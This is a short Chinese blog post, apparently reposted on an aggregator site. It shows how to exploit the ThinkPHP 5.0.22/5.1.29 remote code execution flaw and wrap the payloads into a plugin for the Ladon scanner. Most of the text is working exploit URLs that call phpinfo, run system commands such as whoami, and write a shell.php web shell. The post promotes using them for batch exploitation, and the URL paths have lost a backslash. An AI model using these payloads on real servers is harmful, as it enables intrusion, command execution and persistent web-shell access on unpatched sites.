Ladon插件生成器之ThinkPHP 5.0.22 5.1.29 GetShell Exploit - 润新知

Ladon插件生成器之ThinkPHP 5.0.22 5.1.29 GetShell Exploit

前言

使用Exp生成器生成Ladon插件实战，ThinkPHP GetShell

漏洞环境

使用docker ThinkPHP 5.0.20

复现测试

Payload:

http://192.168.1.37:8080/index.php?s=/Index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

执行命令

http://192.168.1.37:8080/index.php?s=/index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

写入文件

GetShell1

http://192.168.1.37:8080/index.php?s=/index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo 111111>shell.php

GetShell2

/index.php?s=/index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=URL编码内容

视频教程

通过EXP生成器将以上Payload转成DLL，使用Ladon即可批量利用,详情请观看视频教程

Video: K8Cscan ThinkPHP 5.x RCE Exploit
相关阅读:
准备工作
 案例分析
 阅读任务
 准备工作
 案例分析作业
 情 202103226-1 编程作业
 阅读任务
 准备工作
 4 20210412-1 原型设计作业
 3 20210405-1 案例分析作业
原文地址：https://www.cnblogs.com/k8gege/p/12307453.html

热门文章
202103226-1编程作业
 阅读任务
 准备工作
 案例分析
 编程作业
 准备工作
 原型设计作业
 案例分析作业
 202103226-1 编程作业
 阅读任务

Copyright © 2020-2023 润新知